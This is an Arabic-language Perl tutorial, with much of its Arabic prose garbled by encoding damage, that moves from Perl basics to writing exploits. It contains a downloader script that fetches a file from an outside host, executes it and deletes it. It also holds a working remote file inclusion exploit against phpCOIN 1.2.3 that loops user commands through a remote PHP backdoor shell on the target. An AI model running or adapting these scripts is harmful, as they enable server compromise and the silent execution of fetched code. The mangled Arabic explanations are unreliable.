www.t0010.

com

Perl Writing Exploits

 www.t0010.com

Perl Writing Exploits

 ‫
ا ا  ا‬

 !" ‫ اق ظ‬

AlhambA
‫ ب‬.‫ ا‬/ ,‫*) ت ا‬+,
http://www.sniper-sa.com/forums

<=‫ و‬+!?‫ ب ا‬+!‫

;
ه@ا ا‬

C=‫ و‬+‫ رق ا?آ‬F‫ ا‬CD+! ‫ــ‬

##
"‫! ز ا‬K‫ ا‬L,M ND)  I‫ آ‬##

http://www.t0010.com

--------------------------
<=‫ و‬+!?‫ ب ا‬+!‫;
ا‬
------------------------------------------------
aLTar3Q
------------------------------------------------
 www.t0010.com

Perl Writing Exploits

 www.t0010.com

Perl Writing Exploits

- : ‫ا 
ت‬

‫ ا‬:0x01
‫ ت "! ا  ال‬# #$‫ ا‬:0x02
Arrays‫" ت‬%&‫ ا‬:0x03
Hash ‫ ش‬,‫ ا‬:0x04
Conditionals ‫ط‬1‫ أدوات ا‬:0x05
User Input ?@A‫ >=ت ا‬:0x06
Loop ‫ار‬I‫ ا‬:0x07
LibWWWK
‫ ا‬L M N‫ ا‬:0x08
SocketsRS ‫ ا‬:0x09
‫=ل‬#$‫ ا‬S ‫ آ‬:0x0A

,Y‫ ا‬:0x0B

: , Z[=

‫ا‬b‫ وهــ‬Warpboy a‫ــ‬#‫ ا‬milw0rm L‫ ــ? ]ــ‬K‫ ^ــ‬I‫ا‬

‫ ت‬SIA‫
ـ ـ? اـ‬e a‫ـات وـ‬f‫ ف ا‬1‫وف "! اآ‬N
.‫ة‬j %  k^ l^ (>)  ‫"! ا‬
 ‫‪www.t0010.com‬‬

‫‪Perl Writing Exploits‬‬

‫‪ ::‬ا ‪::‬‬

‫ال هـ! ـ ‪#‬ـ‪"  ,‬ـ! ـوره ‪o N‬ـ ا‪Y‬ـ&ص‬

‫و] آ ‪S pq‬ا
‪r^ !" ,‬ـ ت اـ‪ RIq‬واـم أ‪t‬ـ ‪p‬‬
‫ال ^‪@A‬م ‪ u e‬آ‪ M‬أ‪ Zq‬اـ‪
^ M1‬ـ ً ‪," ،‬ـ!‬
‫‪  R%q‬ت ا‪ o‬ا‪>y‬ى ‪I" ،‬ـ‪ M‬ـ و‪,‬ـ ـ‪z‬ات ‪e‬ـ?‬
‫ا‪>$‬ى ‪.‬‬

‫"ــ ل "

ــة ــ? ‪,eq‬ــ "‪,‬ــ! ‪#‬ــ‪  ,‬اــ‪ l N‬و‪#‬ــ‪ ,‬‬
‫ا‪ N#$‬ل‪.‬‬

‫ــ ذا ^‪I‬ــ‪ K‬ا‪#‬ــ=ل ا‪f‬ــات ‪S‬ــ ل ‪e‬ــ? {هــ ؟‬

‫‪ ,q$‬ا[ة ^‪," KI‬ـ ا‪#$‬ـ=ل ‪YS‬ـ‪[ A‬ـا! ‪%70‬‬
‫^‪ S KI‬ل‬

‫وا‪S KA‬ـ ن اآ‪f‬ـ ا‪I,‬ـ

@ـ رون هـ‪b‬ة ا ـ ‪e‬ـ? {هـ ‬
‫‪ KAS‬ا‪  ,# ,q‬ا‪k‬ـ و‪#‬ـ‪  ,‬ا ـ‪ M‬وهـ! آ‪%‬ـء‬
‫‪ ، MN S‬و^‪ zoY‬ا‪. aj " eAS MN‬‬

‫ آـ ن اه ـ إ
‪o‬ـ د ا‪f‬ـات "‪,‬ـ‪b‬ا ا…ـع اـ& ƒ‬
‫‪b,S ,I‬ة ا  ‪.‬‬
 www.t0010.com

Perl Writing Exploits

: ‫ ت "!  ال‬# #y‫ا‬

lk M  ‫ † "! ال ^  ج‬qS b%Y
!I
ActiveStates's perl

http://www.activestate.us L]‫ا ا‬b‫ ? ه‬a [

!&q ‫وا
‹ ً  ر‬
DzSofts Perl‫ا ا ر‬b‫@م ه‬#‫ Œ@& ً ا‬q‫ا‬
www.dzsoft.com L]‫ا ا‬b‫ ه‬u e ‘o^

‘I%‫@م ا‬#‫او ا‬

"perl Editor "Mko‫ "! ا‬K‫ اآ‬# Y^ l ‫او اذا‬
.pl ‫ن‬I
‫ "! ال‬o qS ‫وااد‬

 o‫ ا‬e ” !‫ † "! ال وه‬qS ‫ اول‬KIY

"Hello World ‫ة‬,1‫ا‬
:‫آد‬

#!/usr/bin/perl -w
print "Hello World\n";

filename.pl l#$‫ ا‬b,S aZ%[‫ا‬

: ‫د‬I‫Œح ا‬

‫ ل‬S † qS S I 
‫ اا‬#!/usr/bin/perl
MNA
ً e‫ و‬. šr@‫ ه   šآ ? ا‬-w
k ‫ ا‬q r>‫ أ‬K^
 www.t0010.com

Perl Writing Exploits

›]^ ?e ‫ ء "! ) ; ( @ ال‬r>‫ون ا‬S M1‫و‬

. œ@‫ا ا‬b‫ ه‬u e ‫ااءة‬


k r# "\n"

a ‫ت ا>ى‬$ [ ‫ة‬b‫وه‬

\n NewLine
\r Return
\t Tab
\f Form Feed
\b Backspace
\v Vertical Tab
\e Escape
\a Alarm
\L Lowercase All
\l Lowercase Next
\U Uppercase All
\u Uppercase First

>‫ ل ا‬f

#!/usr/bin/perl -w
print "Hello\tWorld\n\a";

‫ن‬I^ ‫ ]! ا  ت ات ا‬S Mf ‫ "! ال‬b‫وآ‬

‫&ص أو أر] م‬q ‫? ^ ى‬I
‫ و‬، ]¡ ‫ أو‬j‫دا‬
"$".‫Œ رة‬$ S ‫ف‬N^‫و‬

! ‫ ل ا‬f‫Œ ه ا‬

#!/usr/bin/perl -w
$Hello = "Hello World\n";
print $Hello;
 www.t0010.com

Perl Writing Exploits

!" ‫ة‬fIS ‫@م‬A^ !‫@ام )' '( وه‬#‫ ا‬YI

‫و‬
‫" ت‬%&‫ا‬
¥q ‫ آـ‬,Z^ !," '\n' Me ?I
$ ,YS ‫ق‬%‫ا‬
DOT ‫@ام‬# S ¥q L ¥q ›‹^ ‫ ان‬YI
‹
‫وا‬

#!/usr/bin/perl -w
#<---- "#" NS ¨ N^ ‫ ه‬MS ‫د‬I‫ ا‬b%Y
$ Y‫ه‬
$YourName = "YOURNAME" ; # ‫ ا‬Y"e $YourName
print "Hello" . " " . "World" . " " . "My" . " " . "Name" . " " . "Is" . " " .
"$YourName"."\n";

Hello World My Name Is YourName

Mf …
‫  ت ا‬N‫
 ? ا‬N‫ ا‬, ‹
‫وأ‬

#!/usr/bin/perl
#Adding, Subtracting, Multiplying, and Dividing in Perl
#Perl can do all basic math functions and more.
$a = 3 + 5 ; # Lo‫ا‬
$b = 5 * 5; # ‫ا‹ب‬
$c = 10 / 2 ; # A‫ا‬
$x = 12 - 5; # ‫ح‬r‫ا‬
print $a . " " . "ADDITION: The solution should be 8.\n";
print $b . " " . "MULTIPLICATION: The solution should be 25.\n";
print $c . " " . "DIVISION: The solution should be 5.\n";
print $x . " " . "SUBTRACTION: The solution should be 7.\n";
#Autoincrementing and Autodecrementing
$Count = $Count + 1;
print "$Count\n";
#‫  ااءة‬e R%q Y‫ه‬
$Count1 += 1 ; #Decrement $Count1 -=1 1
print "$Count1\n";
#Square Root !NS‫ر ا‬bo‫ا‬
$Square = sqrt(121) ;
print "The square root of 121 is $Square\n";
#Exponents ‫س‬$‫ا‬
$Exp = 2**5 ;
print "$Exp\n";
 www.t0010.com

Perl Writing Exploits

: Arrays ‫" ت‬%&‫ا‬

"%&‫ـ ـ? ـ "ـ! ـ‬f‫ـف أآ‬NS ‫! ^ـم‬," ,,%
"@"‫Œ رة‬²‫@م ا‬Aq ,%
N‫وا[ة و‬

#!/usr/bin/perl
@arrayname=('var1','var2','var3');
print
$arrayname[0]."\n".$arrayname[1]."\n"."$arrayname[2]"
;

Y‹‫ و‬arrayname ,#‫" ا‬%&‫

› ا‬N^ !" q‫أ‬S
var1،var2 ، var3‫اات‬
.‫ول‬$‫ ا&› ا‬e rS Y] l¶

:>‫ ل ا‬f

#!/usr/bin/perl -w
@Hello = ('Hello', 'World');
print join(' ', @Hello) . "\n"; # ‫ دا‬S e r‫ ا‬join

."%& e ” Ye ‫@م‬A^ join ‫اا‬

Split
r‫ ا‬S ?I ¨S A‫ ا‬R%q ‫ ل‬f

#!/usr/bin/perl -w
#The Split Method
$Sentence = "Hello my name is AlhambA.";
@Words = split(/ /, $Sentence) ;
print "@Words" . " " . "That was splitting data" . "\n";
#The Longer Way
@Hello = ('Hello', 'World');
print $Hello[0] . " " . $Hello[1] . "\n";
#Count starts at 0 so 'Hello' = 0 and so on
 www.t0010.com

Perl Writing Exploits

join 
r‫ [  ا‬u‫ ا‬a1^ split 
r‫ا‬

‫ "اغ‬M‫ آ‬Ye ‫  ت‬I‫ ا‬lA^ ‫ء او‬zo^ split 

r‫" ا‬
MN‫ ا‬R%q ‹
‫ أ‬Y‫وه‬

#!/usr/bin/perl -w
@array = qw(bam bam bam bam);
print join(' ', @array);
#Simple

.†‫‘ "! اا‬f‫ آ‬,^ ‫@ا‬#‫اً وا‬k  ,# ‫" ت‬%&‫ا‬

: Hash
‫ع ? اات‬q
‫ [ [اء‬%‫=ً ن ا‬f، ?
] ‫ Œ!ء‬MI MN
‫ ش‬,‫وا‬
%t‫ون از ا‬
"%" ‫Œ رة‬$‫@م ا‬Aq ,%
N‫و‬
:‫ ش‬,‫ ا‬l,% ‫ ل‬f

#!/usr/bin/perl -w
%color=("apple","red","banana","yellow");
print $color{apple}."\n".$color{banana};

‫ ل‬f‫ ا‬R%YS  ‫ح‬A‫و‬

#!/usr/bin/perl
%color=(
apple =>"red",
banana =>"yellow");
print $color{apple}."\n".$color{banana};
 www.t0010.com

Perl Writing Exploits

: Conditionals

‫ ل‬f b>šq ,,% ‫ط‬1‫أدوات ا‬

‫ك‬# Lj k { ‫ إذا آ ن‬، ‫ ح‬%^ ,S ‫ة‬oŒ [‫ أ‬k‫ و‬

Lj k ‫ [ واذا  زال‬%^ M‫šآ‬S Lj k ‫ وإذا آ ن‬، ‫ة‬o1‫ا‬
، L1
? M‫
šآ‬MZ#‫ و‬q ¶ ‫ وا[ة‬M‫ آ‬S
.‫ة‬o1‫ك ا‬S aYrS ‫وإذا ا¾ت‬

:&‫ا‬
if ( Logical ) { some command }

‫ ل‬f

#!/usr/bin/perl -w
$i = 1;
if($i ==1) {
$i++; #Increment 1
print $i . "\n";
#Print's 2 because the variable $i's condition was true
#If $i was any other '#' it wouldnt print anything.
}

i ‫
› ا‬NS ‫ ل
اء‬f‫ا‬
i=1 ‫  اذا آ ن ا‬e r1
! ‫ ا‬rA‫ "! ا‬l¶
† q‫@ج ? ا‬# ‫ { ذ‬، M>‫اد‬

2 ] Nr
‫ و‬1 a ›Z
l¶

‫ ا وف‬string !" ‫ط‬1‫@م ادوات ا‬A^ ‫? ان‬I

‫و‬
&Y‫ا‬
 www.t0010.com

Perl Writing Exploits

:‫ ل‬f

#!/usr/bin/perl -w
$i = Hello;
if($i eq 'Hello') {
print "Hello!\n";
}
else {
print "The variable (i) doesn't equal the correct string!\n";
}

. ‫ط‬1‫
 ¨ ا‬l ‫ ه اذا‬YN Else

" ‫ ا‬M#=A‫? ا‬S q‫ا ر‬

eq equalty ‫ وي‬A

NE INEQUALTY ‫ وي‬A
$
LT LESS THEN ? t‫ا‬
GT GREATER THEN ? ‫اآ‬
LE LESS THEN OR EQUAL ‫ وي‬A
‫ ? او‬t‫ا‬
GE GREATER THEN OR EQUQL ‫ وي‬A
‫اآ ? او‬

: User Input

‫@م‬A‫د> ل ? >=ل ا‬²‫ا‬

‫@م‬A‫ ? ا‬K r
‫ة‬f  ‫=ل‬#‫ ا‬S ‫ آ‬Ye ‫@م‬A
‫و‬
‫=ل‬#$‫ ا‬M1 ً=f ، ¥q ‫إد> ل ] أو‬
.‘ N M1^ !I ‫ ل‬N#$‫ ا‬S IS ‫@م‬A‫"م ا‬
 www.t0010.com

Perl Writing Exploits

:‫ة ”ق =د> ل‬e ‫ ك‬Y‫وه‬

STDIN Method ً$‫أو‬

‫ ت‬q   ‫  اد> ل‬e !‫ه‬

‫ ل‬f

#!/usr/bin/perl -w
#STDIN Method
print "Hello my name is AlhambA, what is your name?: ";
$L1 = <STDIN>;
chomp $L1;
print "Nice to meet you $L1!\n";

NS !‫
  وف ا‬o‫ ا‬rA‫ف ا‬b S !YN^ :chomp
.‫ا‬

: ARGV@ Method !‫ =د> ل ه‬q f‫

 ا‬r‫ا‬


‫ د‬e "%& pA ‫ة‬b‫ه‬

‫ > رات‬u e ‫@م‬A‫ ا‬L‹^ ‫ ان‬YI

‫ة‬b,S : ARGV@
:‫ ل‬f
perl sploit.pl www.somesite.com /forums/ 1

‫ل‬N^ ‫? ان‬I
‫ة ا@ رات‬b‫ ه‬Lk
( perl sploit.pl ) ‫ا‬e 
 www.t0010.com

Perl Writing Exploits

ARGV@
r S ‫@م ا@ رات‬Aq  ‫و] ت‬$‫ ا‬K {‫"! ا‬

#!/usr/bin/perl -w
if(@ARGV !=2) {
print "Usage: perl $0 <name> <number>\n";
exit;
}
($name, $num) = @ARGV;
print "Hello $name & your number was: $num!\n";

b%Y‫ا‬file.pl › ‫ ا‬l#‫ ا‬b>¾ ‫ا ا‬b‫@م ه‬A

$0
. k@‫  ت ا‬N‫ "! ا‬e ” l
‫[  ً و‬

uA^ !‫ ا‬module ‫@ام‬# S f f‫

 ا‬r‫ا‬
:GetOpt

#!/usr/bin/perl -w
#GetOpt STD module
use Getopt::Std;
getopts (":b:n:", \%args);
if (defined $args{n}) {
$n1 = $args{n};
}
if (defined $args{b}) {
$n2 = $args{b};
}
if (!defined $args{n} or !defined $args{b}){
print "Usage: perl $0 -n Name -b Number\n";
exit;
}
print "Hello $n1!\n";
print "Your number was: $n2\n";
print "Visit www.SnIpEr-SA.com today!\n\n";

k‫ ا‬KN& S R

Getopt ‘ A‫ ا‬M
‫ ء اد‬e#‫ ا‬Ã f‫ ا‬rA‫"! ا‬
 www.t0010.com

Perl Writing Exploits

‫@ام‬#‫ وا‬، b,-n- ‫=م‬ey‫ ا‬, getopts LS‫ اا‬rA‫و"! ا‬

%argsl,Y
z@ ‫ ش‬,‫ا‬

n- ‫=م‬N‫د ا‬k ‫
ل اذا آ ن‬Y‫ ه‬R @‫ ا‬rA‫و"! ا‬
، n1‫  ت "! ا‬N‫ن ا‬z> ‫ دس‬A‫ ا‬rA‫"! ا‬
.‫د‬k n-‫=م‬N‫ اذا آ ن ا‬$‫ ا‬$‫ا ا‬b‫ ه‬u‫ ا‬M>
?
b-‫=م‬N‫ ا‬L ‫!ء‬1‫ ا‬R%q‫و‬
{ ‫ط اذا آ ن‬1‫
د ا‬Y‫ ه‬1e ‫ ا دي‬rA‫و"! ا‬
‫=م‬ey‫د
? ا‬k
.aĔ > ‫ وا[ة‬a [ !" $‫ ا‬j t , ‫آ‬: or

‫ن‬I
Ye y‫ ا‬exit  N S † q‫ و
 ¨ ا‬M>#
!" !] ‫ ا‬Lr
‫ و‬، ‫ ا@ رج‬u‫ ا‬z%A" ?"N ?=N‫ا‬
.‫ ل‬f‫ا‬

GetOpt" ‫ ل‬N# S Y
  ‹%‫
 ا‬r‫ن ا‬I#‫و‬
module
‫@ام‬#$‫ ا‬M,# o qS ‫ن‬I
‫ ان‬Ko

: Loop

 ‫ر آد‬I % ‫ار ه‬I‫ا‬

!" eo !," ، ‫ ااءة‬M,# ," ‫د‬I‫ ]اءة ا‬YI

. ‫د‬I‫ا ا‬b‫ه‬

#!/usr/bin/perl -w
#Loop Tutorial
#www.SnIpEr-SA.com
#Join Us TODAY!
##################################
#FULLY Commented#
##################################
#While Loops
#Format
# while (Comparison) {
 www.t0010.com

Perl Writing Exploits

# Action }
#While loops will loop while the comparison is true, if it
changes to false, it will no longer continue to loop through
its set of action(s).
$i = 1;
while($i <= 5) {
print "While:" . $i . "\n";
$i++;
}
#For Loops
#Format
# for (init_expr; test_expr; step_expr;) {
# ACTION }
##
# Init expression is done first, then the test expression is
tested to be true or false then --
# the step expression is executed.
for($t = 1; $t <= 5; $t++) {
print "For:" . $t . "\n";
}
#Until Loops
#Format
# until (Comparison) {
# Action }
##
# An until loop tests the true false comparison, if it is true,
it will continue to loop until the comparison changes to a
# false state.
$p = 1;
until($p == 6) { #It's six because when $p becomes = 5,
it doesnt go through the set of action sequences;
therefore, 5 isn't printed.
print "Until:" . $p . "\n";
$p++;
}
#Foreach Loops
#Used most commonly to loop through lists
#Format
# foreach $num (@array) {
# Action }
 www.t0010.com

Perl Writing Exploits

$n = 1;
foreach $n (1..5) {
print "Foreach:" . $n . "\n";
$n++;
}
#End Tutorial

LibWWW

LibWWW ‫ او‬Lwp
‫ اا‬b‫ وآ‬K
‫ ا‬L Me %  !‫ وه‬M
‫ه ? اد‬
‫"ات‬A‫ ا‬L Me %^ !‫ ا‬HTTP

‫ ل‬S ,Nk Mf^ !," ‫@ ت‬#$‫ ? ا‬fI‫ ا‬, Lwp

1 ‫ ك‬Y‫ ه‬MS [‫ وا‬M
‫ "œ "! د‬R‫ و‬objects
,Y fI‫ا‬
UserAgent ‫ن šف  وه‬I# ,Y [‫ ك وا‬Y‫ه‬
Simple.b‫وآ‬

LWP
!‫ اـ‬K‫ د اآاد ا
ـ‬o
‫  إ‬e Ko
‫ا‬b ً  r N R
M&‫ــ‬%‫ا ا‬b‫ــ ]ــاءة هــ‬NS ‫ ت اــل‬SI‫ــ‬#‫ ــ? ا‬M‫ــ‬e %^
. ,,"‫و‬

‫ح‬1Y# LWP module ‫وأول‬

: LWP Simple module

@A‫ اـ ـ‬M‫ـ اد

ـ‬f‫ن ا[ اآ‬I# M ‫? ا‬
A‫ـ‬%q 
‫ـ‬r  ‫ س ]ي‬#‫ إ‬YI، =#‫ ا‬S ‫"! آ‬
. LWP ‫? د
=ت‬S ‫>=" ت‬$‫? ا‬e l N^‫و‬
 www.t0010.com

Perl Writing Exploits

L] !eAq ‫ …وي ان‬LWP M

‫@م اد‬Aq !I‫و‬
M
‫ة اد‬b‫ه‬

#!/usr/bin/perl
use LWP::Simple; # calls the module #
print "haha?\n";

'C:\Perl\site\lib\LWP' ‫ ز‬,o‫ "! ا‬,N]

use LWP::simple; rA‫ا ا‬b,S ‫ ءه‬e#‫ ا‬l^‫و‬

: LWP M
‫ اد‬L !^ ^ !‫ اوال ا‬ÇNS‫و‬

get($site);
getprint($site);
getstore($site, $savefile);

url M] ? S r‫ات ا‬YA‫ ا‬Y K o^ get($site);

,Nk^‫و‬

K
‫  ا‬%t ‫ &ر‬Lr^ getprint($site);

!" › ‫ ا‬È% ^‫ و‬,  ^ getstore($site, $savefile);

b%Y‫  ا‬o

‫
رة‬zS l] lwp M
‫ اد‬L !^ ^ !‫ ا‬f‫واذا اردت دوال اآ‬
http://search.cpan.org/dist/libwww-perl/lib/
 www.t0010.com

Perl Writing Exploits

l
›‫ف ا
‹š آ‬N ‫رة‬t ƒ% ‫ ل‬f‫ا ا‬b‫ ه ه‬1q
K
‫ "! ا‬M ‫ا‬

#!/usr/bin/perl
#Perl Web Downloader
#///Config///#
use LWP::Simple;
getstore('http://secure0000.110mb.com/Banner.jpg',
'Banner.jpg'); #downloads + stores file
system('Banner.jpg'); #executes the
sleep(3); #sleeps (waits)
unlink ('Banner.jpg'); #deletes the file

l¶ ‫ ز‬,o‫ ا › "! ا‬È%[‫ و‬, [ l¶‫

› و‬N‫اء "! ا‬S
.› ‫ف ا‬b[ l¶ !q‫ ¶ا‬3 Zq‫ ا‬l¶ , "

LWP UserAgent :M
‫ ً د‬q ¶

LWP M‫ـ? د
ـ‬e ‫ات‬z‫
ـ ـ? اـ‬z‫ ا‬a‫ ـ‬M‫ا اد
ـ‬b‫ه‬
‫ـ‬S I ‫ات‬z‫ة اـ‬b‫ هـ‬l N‫  ان ^ـ‬e R ?I‫و‬Simple
‫ات‬z‫ة اـ‬b‫! وا[ـة ـ? هـ‬rY‫ـ‬# œ‫ "ـ‬M‫ـ‬S ^=#‫ا‬
.‫=ك‬#‫ ا‬S I
YA‫ا ا‬b‫اءة ه‬S ƒ&Y
L#‫واذا اردت ا‬

http://search.cpan.org/~gaas/libwww-...P/UserAgent.pm

: GETK r‫? ا‬e l Nq Ye‫د‬

K‫ ــ‬r
GET K‫ ــ‬r‫ــف ا‬N
‫ا او^آــل‬b‫ هــ‬HTTP/1.1
!‫ وهـ‬، ‫ـ‬N‫ـ ن ا‬I‫ ا‬u‫  ت ـ? اـ&ر ا ـد اـ‬r‫ا‬
‫ اـم‬I1‫ اـ‬u‫ ـ‬e MNA‫ ً و^ـ‬e‫ـ Œـ‬f‫آ‬y‫
ـ ا‬r‫ا‬
‫ـان‬Ye ?‫ ” ـ ت ـ‬u‫ ـ‬e M&‫ ـ‬Y GET K‫ ـ‬r‫ ا‬MNA‫ـ‬q‫و‬
L]‫ا‬
Digest::MD5 M
‫ى ا
‹ ً اد‬Y‫و‬
 www.t0010.com

Perl Writing Exploits

aS t > ‫ ك دوال‬Y‫ وه‬%1 S  ƒA

M
‫ا اد‬b‫ه‬
‫ ”ق‬b‫وآ‬

!‫اوال ه‬

md5($data,...)
md5_hex($data,...)
md5_base64($data,...)

md5($data,...)
MI1‫ه "! ا‬N^ l¶ MD5 digest KA ^ ‫ة اا‬b‫ه‬
.p
S 16 ,” binary !j Yf‫ا‬

md5_hex($data,...)
1e ‫ دس‬A‫ ا‬MI1‫ ا‬N^ ?I ¨S A‫ ا‬R%q
32 ,”hexadecimal
‫ن‬I
‫ا ى‬
'a'..'f'.‫و‬0'..'9'

md5_base64($data,...)
,” %1‫ ا‬base64 MI1‫ ا‬N^ ?I ¨S A‫ ا‬R%q
22
‫ن‬I
‫ا ى‬
'/'.‫' و‬+' ‫'و‬9'..'0' ‫' و‬a'..'z'‫'و‬A'..'Z'

:‫ ل‬f

use Digest::MD5 qw(md5_hex);

print "Digest is ", md5_hex("foobarbaz"), "\n";

‫ا ا@ج‬b‫وه‬
Digest is 6df23dc03f9b54cc38a0fc1483df6e21
 www.t0010.com

Perl Writing Exploits

Digest::MD5 ?e ‫œ
 ث‬S‫ا اا‬b‫ه‬
http://search.cpan.org/~gaas/Digest-MD5-2.36/MD5.pm

Y,
 GET K r ‫د‬Nq
‫ ت‬q S ‫ة‬e ] u e GET K ” S ‫م‬Y# ‫ ل‬f‫ا ا‬b‫"! ه‬
LWP UserAgentM
‫ اد‬L ," ,Y
z@^‫ و‬Md5

#!/usr/bin/perl
# Md5 Database Filler #
# Version 1.0, Add Word Manually #
# www.SnIpEr-SA.com #
# Modules needed : LWP (User Agent), Digest (MD5) #
# Download + INSTALL md5 digest module #
use LWP::UserAgent; # Calling our LWP Useragent module
use Digest::MD5 qw(md5_hex); # Calling our Digest MD5
module (Install {if you need it})
$brow = LWP::UserAgent->new; # Our new useragent
defined under the variable $brow
while(1) {
# Just a simple while loop that will run the program
continously instead of just 1 time
print "Word to add: ";
$var = <STDIN>;
chomp ($var);
$seek = "http://md5.rednoize.com/?q=$var&b=MD5-
Search";
$brow->get( $seek ) or die "Failed to Send GET
request!/n";
print "$var" . " : " . md5_hex("$var") . " was added to
database " . "\n";
}
# End of the while loop
# To test if it worked go to http://md5.rednoize.com/ and
search your md5(hex) hash given to you
# It should crack :)
# This was a simple example of a get request executed on
a server
 www.t0010.com

Perl Writing Exploits

LWP (User M‫ ء اد

ــ‬e‫ــ‬#‫ إ‬l‫ــ ل
ــ‬f‫ا ا‬b‫" ـ! ه ـ‬
.? ‫ـ‬f‫ و ا‬LS A‫ اـ‬rA‫"ـ! اـ‬Agent), Digest (MD5)
!" ,N…‫
ة وو‬k useragent Me L# ‫ ا‬rA‫و"! ا‬
$brow .‫ا‬

.!j ,q $ ‫ار‬I^ Me ! ‫وا‬

‫ـ ت‬q ‫ـة ا‬e ] œ‫ـ‬S‫ـان را‬Ye ‫ـف‬N

$seek ‫و"ـ! اـ‬
.‫ـة‬e ‫ "ـ! ا‬a‫ي اد> ـ‬b‫ اـ‬l#$‫ن ا‬z@# Y‫ ه‬urN‫ا‬
u‫ ـ‬e get K‫ ـ‬r‫ ا‬b%Y‫ـ‬# ƒ%&‫ اـ ! اـ‬rA‫و"! ا‬
K‫ ” ــ‬S š‫ــ‬r> ‫ واذا آــ ن [ــث‬$seek ‫ــف‬N‫اــ ا‬
šr@‫  ا‬#‫ ر‬M##

b‫ وآــ‬a‫ي اد> ــ‬b‫ اــ‬l‫ــ‬#$‫ــ ا‬e ” l‫>ــ

ــ‬$‫و"ــ! ا‬
. RI,‫ا ا‬S %1‫ا‬

L]‫ ا‬u‫ ا‬K‫ اذه‬l#$‫واذا ارت ان ^šآ ? ا… " ا‬

http://md5.rednoize.com/

‫ ش‬,‫ ا‬L ‘‫ا‬#‫ و‬l#$‫? ا‬e à S‫و‬

Sockets
 www.t0010.com

Perl Writing Exploits

IO M‫ـ ت  د
ـ‬# #$‫ ا‬b> Y# ‫ء‬zo‫ا ا‬b‫ "! ه‬RS ‫ا‬
Socket INET‫( وهـ‬Input/Output) ‫>ـاج‬$‫د>ـ ل وا‬$‫ا‬
‫=ات‬#‫@م "! ا‬A
‫و‬

IO Socket INET module

RS ‫@م ا‬A^‫و‬، ‫ ء‬1qÌ  e %‫ ا‬t YN‫ ا‬z,o 

AF_INET ?‫او‬

‫ ل‬f‫ا ا‬b‫"! ه‬
80 ‫ ارت‬u e ip u e ‫œ =^& ل‬AS R ‫ ء‬1Y#

#!/usr/bin/perl
use IO::Socket; # M
‫ اد‬ueA
IO Socket
print "An IP to connect to: ";
$ip = <STDIN>;#‘‫اآ‬b‫! "! ا‬S ‫ن ا اي‬z@#
chomp($ip);
$i=1;
while($i <=5) {
$sock = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>"$ip", PeerPort=>'80') or die"Couldn't
connect!\n";
#Proto or Protocol (TCP/UDP) Y@#‫ ا‬Y‫ ه‬tcp
#PeerAddr or Peer Address M ‫@م‬A^ ip
print "Connected!\n";
$i++;
}

SQL injection exploits !" MNA^ M

‫ا اد‬b‫ه‬
‫ ن‬k‫
? او‬I b‫وآ‬
. ¨" Sockets ?e ‫ ك آ ب
 ث‬Y‫وه‬
 www.t0010.com

Perl Writing Exploits

Writing an Exploit

(RFI (Remote File Include) u e ‫ن‬I# !‫وه‬

phpCOIN 1.2.3 .† qS !" ‫ة‬f‫ا‬

http://milw0rm.com/exploits/2254

www.site.com/coin_includes/constants.php?_CCFG[_PKG_PATH_I
NCL]=SHELL?&cmd=COMMAND

R ," ‫ آد‬M‫ آ‬l,"‫د ا‬I‫ ا‬l,%^ !I aA^ l^

‫ن‬Î‫  ا‬e KNt

Y‫ { وا…ƒ ه‬," ‫ة‬I% u‫د ا‬I‫ ا‬ÏAq‫ا‬

#!/usr/bin/perl
# http://milw0rm.com/exploits/2254 #
# phpCOIN 1.2.3 (_CCFG[_PKG_PATH_INCL]) Remote
Include Vulnerability #
# Vulnerability found by TimQ #
# Coded Exploit By Warpboy #
use LWP::UserAgent; # We call our module
#Store our user inputted information into variables
# [=&‫ @ ر ا‬,@Aq u‫ف اات ا>  ا‬NY#
‫ ل‬N#$ S
$site = @ARGV[0];
$shellsite = @ARGV[1];
$shellcmd = @ARGV[2];
if($site!~/http:\/\// || $site!~/http:\/\// || !$shellsite)
{
usg() # If the Url is invalid jump to the usg subrountine ‫اذا‬
b%Y# ƒ t ‫ آ ن‬usg subrountine ‫=ل‬#$‫ ا‬M%#‫ "! ا‬L]‫وا‬
M1# ‫ط‬1‫ ذ ا‬NS l¶
}
header(); # Run through contents in the header
subrountine b‫ وآ‬header subrountine ‫ء‬zo‫ "! ا‬b%Y#
‫ون Œط‬S ueA# ‫=ل‬#$‫ ا‬M%#‫ا‬
 www.t0010.com

Perl Writing Exploits

#----------------------------------------------------------
# Some loops to give us the ability to continue to use
more than one command on the server.
# Without these we would have to re-start the exploit for
each command
# "A‫ ا‬u‫ ء اوا ا‬re‫ار "! ا‬#$‫ ا‬Lr# ‫ ب‬r#‫ا‬S
b%Y^ ‫ ء‬r>$‫ ا‬u[‫ † و‬q‫ ا‬b%Y^ Ye œ" [‫ ا وا‬R‫و‬
!" Y‫=ل ? ا‹ر‘ ا>ل ه‬#$‫ ا‬b%Y^ !‫ار آ‬# S
 ‫ ا‬while Y e Y‫ وه‬while() == while(1) b%Y^ ‫اي‬
‫اررررر‬# S
while()
{
print "[shell] \$";
while(<STDIN>) # Recognize STDIN as a user input
method, while(<STDIN>) basically states that while your
taking user input for the command, do the following.
{
# ‫ه‬b%Y^ ‫وا ااد‬$‫ ا‬Y‫ ه‬M>Y#
$cmd=$_; #@_ :the argument passed to sub routine
chomp($cmd); #Chomps the newline off the user inputted
command
#---------------------------------------------------------
# Y"N Ye LWP Useragent module %Aq ‫د‬I‫ا ? ا‬b,S
^=#‫ ا‬,Y MN^ !I‫  و‬N%‫‘ ا‬f‫? ا‬
$xpl = LWP::UserAgent->new() or die;
#Defines the variable $xpl as a new useragent
$req = HTTP::Request-
>new(GET=>$site.'/coin_includes/constants.php?_CCFG[
_PKG_PATH_INCL]='.$shellsite.'?&'.$shellcmd.'='.$cmd)o
r die "\n\n Failed to Connect, Try again!\n";
#K r‫ف ا‬N# get ‫ ا& ب‬L]‫ ا‬u‫ة ا‬f‫ ا‬M#
‫و‬
#‫ ا‬$req K r‫ ا‬b%Y
get L]‫@م اد> ل ا‬A‫ ا‬u e‫و‬
‫ ا& ب "! ا‬$site .‫ة‬f‫ ا‬L]‫ ا‬u e ¨r
l¶
#$shellsite where the php backdoor is located, is the
$shellcmd (php shell command variable) and $cmd
variable which was the user
#$shellcmd inputted command to execute on the server
with the php backdoor. The final url
 www.t0010.com

Perl Writing Exploits

# Would look like

www.site.com/coin_includes/constants.php?_CCFG[_PKG
_PATH_INCL]=SHELL?&cmd=COMMAND #
# l
‫ وا[ و‬MIŒ !" ‫ د† ات‬MN# ‘b‫ ه‬a #=A‫ا‬
‫ "! ا‬,o‫ د‬$req
